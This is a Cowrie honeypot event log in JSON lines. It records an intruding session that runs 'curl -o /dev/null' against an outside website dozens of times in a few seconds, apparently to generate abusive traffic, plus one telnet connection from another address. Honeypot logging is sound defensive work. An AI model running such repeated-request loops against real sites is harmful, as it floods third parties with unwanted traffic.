{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.728442Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.765519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.766582Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.803609Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.804774Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.843183Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.844198Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.881554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.882799Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.919655Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.920780Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.968548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.969705Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.007663Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.008757Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.046973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.048146Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.084457Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.086846Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.087969Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.124995Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.126154Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.163167Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.164617Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.201508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.202747Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.239295Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.240414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.277365Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.278834Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.316361Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.317381Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.364683Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.365645Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.402289Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.403650Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.440807Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.441817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.479973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.481110Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.517714Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.519219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.557915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.559136Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.600512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.601536Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.639232Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.640331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.677766Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.678963Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.716642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.717724Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.769627Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.770472Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.819245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.820246Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.858740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.859839Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.897330Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.898402Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.938947Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.940028Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:59.976983Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:59.978142Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.016065Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.017311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.069680Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.071143Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.128644Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.129791Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.167427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.168738Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.217223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.218419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":47200,"dst_ip":"1.2.3.4","dst_port":23,"session":"69bb13a80e72","protocol":"telnet","message":"New connection: 8.222.212.69:47200 (1.2.3.4:23) [session: 69bb13a80e72]","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.246118Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.255720Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.257008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.294319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.295530Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.334448Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.335719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.374732Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.375912Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.413033Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.414453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.452748Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.454109Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.491810Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.492895Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.529755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.530852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.568352Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.569419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.616555Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.617575Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.654768Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.655956Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.697095Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.698601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.735762Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.736703Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.773404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.774602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.813043Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.814363Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.851892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.853066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.891237Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.892201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.930229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.931876Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:00.969115Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:00.970277Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.018267Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.019958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.057650Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.059422Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.096947Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.098235Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.148247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.149505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.187534Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.188695Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.230854Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.232315Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.269984Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.271263Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.311919Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
